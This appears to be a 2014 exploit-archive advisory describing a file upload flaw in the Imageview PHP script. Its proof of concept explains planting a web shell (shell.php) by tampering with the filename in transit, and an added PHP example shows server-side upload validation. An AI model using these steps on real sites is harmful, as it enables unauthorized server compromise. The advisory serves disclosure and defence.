Imageview File Upload vulnerability

Author: TUNISIAN CYBER, Published: 21-01-2014
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Imageview File Upload vulnerability
[+] Date: 20-01-2014
[+] Category: WebApp
[+] Google Dork: :
[+] Tested on: Kali Linux
[+] Friendly Sites: na3il.com,th3-creative.com
#############################################################
+Exploit:
Imageview suffers from a file upload vulnerability that allows an attacker
to upload a PHP file.

+P.O.C:
127.0.0.1/[PATH]/upload.php
Upload as shell.php.[img extension jpg png gif]
Change it using Tamper Data
Shell Path:
127.0.0.1/[PATH]/albums/shell.php

+Demo:

+Fix:
There is no fix from the script's owner; as a workaround, change the name or path of "upload.php".
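
A server-side check that closes the hole shown in the P.O.C., as an added example (not Imageview's code and not from the advisory's author): the type is decided from the uploaded bytes and the stored name is generated by the server, so a filename rewritten in transit has no effect. The function name `store_album_image`, the `$albumDir` parameter and the `image` form field are hypothetical; the `fileinfo` extension is assumed to be enabled.

```php
<?php
declare(strict_types=1);

/**
 * Validate one $_FILES entry and move it into $albumDir.
 * Returns the stored file name; throws RuntimeException on rejection.
 * Hypothetical helper for illustration, not part of Imageview.
 */
function store_album_image(array $file, string $albumDir): string
{
    // Detected MIME type => extension the server will use on disk.
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file((string) ($file['tmp_name'] ?? ''))) {
        throw new RuntimeException('upload failed');
    }
    $tmp = $file['tmp_name'];

    // Decide the type from the file's bytes. $file['name'] and $file['type']
    // are request fields the client controls, so they are never consulted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    if (!is_string($mime) || !array_key_exists($mime, $allowed)
        || @getimagesize($tmp) === false) {
        throw new RuntimeException('not an accepted image');
    }

    // Server-generated name with an extension taken from the detected type:
    // a client-supplied name such as "shell.php" never reaches the filesystem.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    if (!move_uploaded_file($tmp, rtrim($albumDir, '/') . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

// Assumed call site inside upload.php:
// $stored = store_album_image($_FILES['image'], __DIR__ . '/albums');
```

A file that is a valid image can still carry PHP text in its metadata, so the server-chosen image extension matters as much as the content check. Configuring the web server so that nothing under `albums/` is handed to the PHP interpreter covers the case where a script lands there anyway.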
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################